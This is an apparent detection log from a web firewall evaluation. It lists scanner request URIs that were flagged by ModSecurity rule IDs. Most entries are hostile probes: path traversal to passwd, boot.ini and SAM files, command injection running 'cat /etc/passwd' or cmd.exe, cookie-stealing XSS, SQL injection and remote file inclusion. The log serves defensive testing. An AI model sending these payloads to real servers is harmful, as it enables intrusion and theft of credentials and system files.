# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l wikto.short -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/ficheros_uris_completos/web_estatica/modsecurity/wikto_short.clean
Packet [1]	Uri [../../../../../../../../../../etc/*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [2]	Uri [../../../../../../../../../../etc/passw*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [4]	Uri [/%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [5]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [6]	Uri [/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [7]	Uri [/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [9]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [10]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [13]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [15]	Uri [/%a%s%p%d]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [16]	Uri [/%NETHOOD%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [18]	Uri [/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [19]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [20]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [21]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [22]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [23]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [24]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [25]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [26]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [27]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [28]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [29]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [30]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [31]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [32]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [33]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [34]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [35]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [36]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [37]	Uri [/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [38]	Uri [/................../config.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [39]	Uri [/................../conSensePostNotThereNoNo.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [43]	Uri [/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [44]	Uri [/../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [45]	Uri [/../../../../../../../../../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [46]	Uri [/../../../../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [47]	Uri [/../../../../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [48]	Uri [/../config.dat]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [49]	Uri [/../webserver.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [50]	Uri [/..\..\..\..\..\..\temp\temp.class]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [51]	Uri [/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [55]	Uri [/.bashrc]	Nattacks [1 ]	Signatures	[930130]
Packet [56]	Uri [/.bash_history]	Nattacks [1 ]	Signatures	[930130]
Packet [57]	Uri [/.cobalt/sysManage/../admin/.htaccess]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930130]
Packet [58]	Uri [/.DS_Store]	Nattacks [1 ]	Signatures	[930130]
Packet [62]	Uri [/.htaccess]	Nattacks [1 ]	Signatures	[930130]
Packet [63]	Uri [/.htpasswd]	Nattacks [1 ]	Signatures	[930130]
Packet [65]	Uri [/.mysql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [66]	Uri [/.nsconfig]	Nattacks [1 ]	Signatures	[930130]
Packet [67]	Uri [/.nsf/../winnt/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [68]	Uri [/.nsf/../winnt/winSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [75]	Uri [/.profile]	Nattacks [1 ]	Signatures	[930130]
Packet [76]	Uri [/.psql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [78]	Uri [/.sh_history]	Nattacks [1 ]	Signatures	[930130]
Packet [80]	Uri [/.ssh/authorized_keys]	Nattacks [1 ]	Signatures	[930130]
Packet [83]	Uri [/.ssh/known_hosts]	Nattacks [1 ]	Signatures	[930130]
Packet [87]	Uri [//..\SensePostNotThereNoNolass]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [89]	Uri [//.adSensePostNotThereNoNobook]	Nattacks [1 ]	Signatures	[913120]
Packet [113]	Uri [////./../.../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [120]	Uri [//accSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [188]	Uri [//banSensePostNotThereNoNo.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [189]	Uri [//banSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [190]	Uri [//banSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [191]	Uri [//banSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [215]	Uri [//carSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [251]	Uri [//conSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [262]	Uri [//cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [273]	Uri [//danSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [275]	Uri [//datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [284]	Uri [//db.SensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [321]	Uri [//emuSensePostNotThereNoNo.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [334]	Uri [//extSensePostNotThereNoNo.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [355]	Uri [//gloSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [405]	Uri [//indSensePostNotThereNoNo.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [406]	Uri [//indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [484]	Uri [//logSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [486]	Uri [//LOGSensePostNotThereNoNo.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [515]	Uri [//midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [580]	Uri [//phpSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [604]	Uri [//pt_SensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [614]	Uri [//pwdSensePostNotThereNoNod.db]	Nattacks [1 ]	Signatures	[920440]
Packet [618]	Uri [//quiSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [660]	Uri [//shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [684]	Uri [//sqlSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [685]	Uri [//sqlSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [690]	Uri [//ss.SensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [712]	Uri [//strSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [772]	Uri [//WebSensePostNotThereNoNo.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [793]	Uri [//whaSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [799]	Uri [//WS_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [800]	Uri [//ws_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [801]	Uri [//WS_SensePostNotThereNoNo.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [828]	Uri [/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [839]	Uri [/acart2_0/acart2_0.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [840]	Uri [/acart2_0/acaSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [847]	Uri [/access.log]	Nattacks [1 ]	Signatures	[920440]
Packet [857]	Uri [/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/]	Nattacks [1 ]	Signatures	[931130]
Packet [858]	Uri [/active.log]	Nattacks [1 ]	Signatures	[920440]
Packet [873]	Uri [/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [906]	Uri [/admin/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [907]	Uri [/admin/cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [910]	Uri [/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [911]	Uri [/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [917]	Uri [/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [935]	Uri [/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [952]	Uri [/Admin_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [953]	Uri [/Admin_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [973]	Uri [/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [978]	Uri [/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [979]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [1005]	Uri [/ASP/cart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1006]	Uri [/ASP/cart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1010]	Uri [/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1011]	Uri [/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1015]	Uri [/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1031]	Uri [/ban.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [1032]	Uri [/ban.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1033]	Uri [/ban.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1039]	Uri [/banmat.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1040]	Uri [/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*]	Nattacks [5 ]	Signatures	[920220]	[920272]	[942260]	[942440]	[942460]
Packet [1041]	Uri [/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1043]	Uri [/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1087]	Uri [/blahb.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1088]	Uri [/blahb.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1093]	Uri [/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1094]	Uri [/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1107]	Uri [/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1112]	Uri [/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1113]	Uri [/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1114]	Uri [/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [1118]	Uri [/carbo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1125]	Uri [/catalog/includes/include_once.php]	Nattacks [1 ]	Signatures	[933150]
Packet [1129]	Uri [/catinfo?<u><b>TESTING]	Nattacks [2 ]	Signatures	[941320]	[942130]
Packet [1145]	Uri [/ccbill/secure/ccbill.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1146]	Uri [/ccbill/secure/ccbSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1161]	Uri [/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1162]	Uri [/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1168]	Uri [/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1170]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1177]	Uri [/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1190]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1191]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1193]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1194]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1195]	Uri [/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [1231]	Uri [/cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download]	Nattacks [1 ]	Signatures	[920272]
Packet [1243]	Uri [/cgi-bin/snorkerz.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1244]	Uri [/cgi-bin/snorkerz.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1245]	Uri [/cgi-bin/snoSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1246]	Uri [/cgi-bin/snoSensePostNotThereNoNo.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1253]	Uri [/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1254]	Uri [/cgi-dos/argSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1259]	Uri [/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1345]	Uri [/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1358]	Uri [/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1371]	Uri [/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1380]	Uri [/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1381]	Uri [/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1395]	Uri [/dan_o.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1397]	Uri [/data.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1407]	Uri [/database/db2000.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1408]	Uri [/database/db2SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1409]	Uri [/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1411]	Uri [/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1414]	Uri [/databse.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1419]	Uri [/db.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1421]	Uri [/db/users.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1422]	Uri [/db/useSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1430]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1449]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1451]	Uri [/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [1452]	Uri [/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [1459]	Uri [/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1464]	Uri [/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1507]	Uri [/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1511]	Uri [/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1537]	Uri [/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1543]	Uri [/emumail.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1548]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1549]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1551]	Uri [/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/]	Nattacks [2 ]	Signatures	[931110]	[931130]
Packet [1589]	Uri [/exchange/lib/AMPROPS.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1590]	Uri [/exchange/lib/ATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1591]	Uri [/exchange/lib/DELETE.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1592]	Uri [/exchange/lib/GETREND.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1593]	Uri [/exchange/lib/GETWHEN.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1594]	Uri [/exchange/lib/JSATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1595]	Uri [/exchange/lib/JSROOT.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1596]	Uri [/exchange/lib/JSUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1597]	Uri [/exchange/lib/LANG.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1598]	Uri [/exchange/lib/logon.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1599]	Uri [/exchange/lib/PAGEUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1600]	Uri [/exchange/lib/PUBFLD.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1601]	Uri [/exchange/lib/RENDER.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1602]	Uri [/exchange/lib/SESSION.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1607]	Uri [/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [1608]	Uri [/ext.ini.%00.txt]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1616]	Uri [/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1622]	Uri [/file/../../../../../../../../etc/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1623]	Uri [/file/../../../../../../../../etcSensePostNotThereNoNoetc/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1644]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1645]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1646]	Uri [/forum-ra.asp?n=/../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1647]	Uri [/forum-ra.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1648]	Uri [/forum-ra.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1649]	Uri [/forum-ra.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1650]	Uri [/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1651]	Uri [/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1652]	Uri [/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1653]	Uri [/forum-ra_professionnel.asp?n=../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1654]	Uri [/forum-ra_professionnel.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1655]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1656]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1657]	Uri [/forum-ra_professionnel.asp?n=/../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
